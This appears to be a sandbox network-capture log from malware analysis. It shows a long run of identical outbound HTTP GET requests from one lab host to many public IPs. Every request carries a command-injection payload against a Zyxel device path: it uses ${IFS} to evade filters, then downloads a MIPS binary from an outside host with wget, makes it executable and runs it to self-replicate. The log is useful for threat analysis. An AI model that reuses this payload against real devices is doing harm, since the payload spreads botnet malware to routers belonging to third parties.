                                                Jan 29, 2024 07:07:45.270243883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3662192.168.2.2333200125.50.83.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270297050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3663192.168.2.2354500138.155.177.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270358086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3664192.168.2.2359422112.222.78.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270427942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3665192.168.2.235095444.42.25.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270488024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3666192.168.2.234182645.135.202.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270539999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3667192.168.2.2358406164.88.17.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270600080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3668192.168.2.2355522180.39.147.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270659924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3669192.168.2.235347275.180.11.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270715952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3670192.168.2.233731285.135.156.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270770073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3671192.168.2.2353804140.46.187.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270842075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3672192.168.2.2337496195.71.160.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270905972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3673192.168.2.233398661.143.151.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270965099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3674192.168.2.2336416167.213.156.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271027088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3675192.168.2.2338740221.98.246.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271090984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3676192.168.2.234144070.221.22.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271147966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3677192.168.2.2356968177.26.92.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271204948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3678192.168.2.235428247.178.241.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271245003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3679192.168.2.2338252163.145.175.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271307945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3680192.168.2.2349996138.122.112.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271375895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3681192.168.2.2337020156.56.134.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271433115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3682192.168.2.2347038134.249.144.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271491051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3683192.168.2.234917488.116.170.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271573067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3684192.168.2.2346392134.25.193.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271646976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3685192.168.2.2356270132.74.212.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271704912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3686192.168.2.23337565.129.19.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271768093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3687192.168.2.233620048.223.64.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271837950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3688192.168.2.234180617.6.74.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271908998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3689192.168.2.2334296170.81.8.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.271967888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3690192.168.2.2360582105.24.159.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272039890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3691192.168.2.2337308122.50.189.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272092104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3692192.168.2.2344896162.55.166.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272162914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3693192.168.2.2348214113.239.126.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272214890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3694192.168.2.2349074192.100.75.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272281885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3695192.168.2.2338512211.180.124.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272337914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3696192.168.2.233515899.237.144.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272398949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3697192.168.2.234311847.93.17.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272459030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3698192.168.2.2349016128.154.238.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272516966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3699192.168.2.23506022.60.17.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272573948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3700192.168.2.234829261.154.235.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272624969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3701192.168.2.2351964179.20.27.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272680044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3702192.168.2.2335272108.109.157.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272737980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3703192.168.2.2360706212.236.155.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272821903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3704192.168.2.2355948174.124.198.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272869110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3705192.168.2.235296487.47.102.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272942066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3706192.168.2.2338598136.184.31.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.272995949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3707192.168.2.2354230223.158.171.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273061037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3708192.168.2.235342414.35.1.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273122072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3709192.168.2.234318685.121.175.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273179054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3710192.168.2.2346840167.64.130.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273241997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3711192.168.2.2350374179.245.56.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273302078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3712192.168.2.2343608163.1.178.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273356915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3713192.168.2.234200027.205.144.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273421049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3714192.168.2.235484653.152.78.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273478031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3715192.168.2.2360096139.193.229.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273550034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3716192.168.2.2360744178.49.58.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273600101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3717192.168.2.23445224.226.62.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273643017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3718192.168.2.234034875.56.184.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273720980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3719192.168.2.233436225.136.148.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273781061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3720192.168.2.2351582118.241.244.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273848057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3721192.168.2.2339806141.101.111.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273906946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3722192.168.2.235664038.47.32.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.273994923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3723192.168.2.2332790163.180.15.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274035931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3724192.168.2.2336162140.44.53.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274102926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3725192.168.2.2354784153.14.55.110443
                                                TimestampBytes transferredDirectionData
